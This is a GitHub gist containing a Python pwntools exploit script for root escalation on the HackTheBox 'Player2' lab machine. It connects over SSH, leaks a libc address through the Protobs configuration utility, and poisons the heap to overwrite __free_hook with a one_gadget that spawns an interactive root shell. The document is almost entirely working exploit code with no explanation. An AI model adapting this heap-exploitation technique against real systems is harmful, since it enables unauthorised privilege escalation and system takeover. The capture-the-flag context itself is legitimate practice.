HackTheBox Player2 Root Exploit
#!/usr/bin/python | |
from pwn import * | |
import random | |
import string | |
import time | |
# Author: xct | |
def create_config(p, name='xct', desc_size=0, desc=''): | |
p.recvuntil('protobs@player2:~$') | |
p.sendline('2') | |
p.recvuntil(']:') | |
p.sendline(name) | |
p.recvuntil(']:') | |
p.sendline('') | |
p.recvuntil(']:') | |
p.sendline('') | |
p.recvuntil(']:') | |
p.sendline('') | |
p.recvuntil(']:') | |
p.sendline('') | |
p.recvuntil(']:') | |
p.sendline('') | |
p.recvuntil(']:') | |
p.sendline(str(desc_size)) | |
p.recvuntil(']:') | |
p.send(desc) | |
def delete_config(p, index): | |
p.recvuntil('protobs@player2:~$') | |
p.sendline('4') | |
p.recvuntil(']:') | |
p.sendline(str(index)) | |
def read_config(p, index): | |
p.recvuntil('protobs@player2:~$') | |
p.sendline('3') | |
p.recvuntil(']:') | |
p.sendline(str(index)) | |
context.arch = 'amd64' | |
context.log_level = 'debug' | |
libc = ELF('./libc.so.6') | |
main = ELF('./Protobs') | |
BASE_OFFSET = 0x1EB9a8 # this changes slightly, was 0x1EB998 | |
FREE_HOOK = 0x1E75A8 # print &__free_hook | |
ONE_GADGET = 0xe2383 | |
s = ssh(host='10.10.10.170', user='observer', keyfile='observer.key') | |
p = s.run('/opt/Configuration_Utility/Protobs') | |
create_config(p, desc_size=72, desc='A'*64) | |
read_config(p, 0) | |
p.recvuntil("A"*(64)) | |
leak = p.recvline()[:-1] | |
leak += b"\x00\x00" | |
leak = u64(leak) | |
base = leak-BASE_OFFSET | |
log.success('Leak: ' +hex(leak)) | |
log.success('Libc-Base: '+hex(base)) | |
idx = 1 | |
create_config(p, desc_size=0x68, name='BBBB', desc='B'*(0x68)) #1 | |
create_config(p, desc_size=0x68, name='CCCC', desc='C'*(0x68)) #2 | |
create_config(p, desc_size=0x38, name='DDDD', desc='D'*(0x38)) #3 | |
create_config(p, desc_size=0x20, name='ZZZZ', desc='Z'*(0x20)) #4 | |
delete_config(p, idx+2) | |
delete_config(p, idx+1) | |
create_config(p, desc_size=0x68, name=b'M'*0x68+b'N'*8+p64(base+FREE_HOOK), desc=b'P'*(0x20)) | |
create_config(p, desc_size=0x38, name=p64(0xcafebabe), desc=p64(base+ONE_GADGET)) | |
delete_config(p, 0) | |
p.interactive() | |
p.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment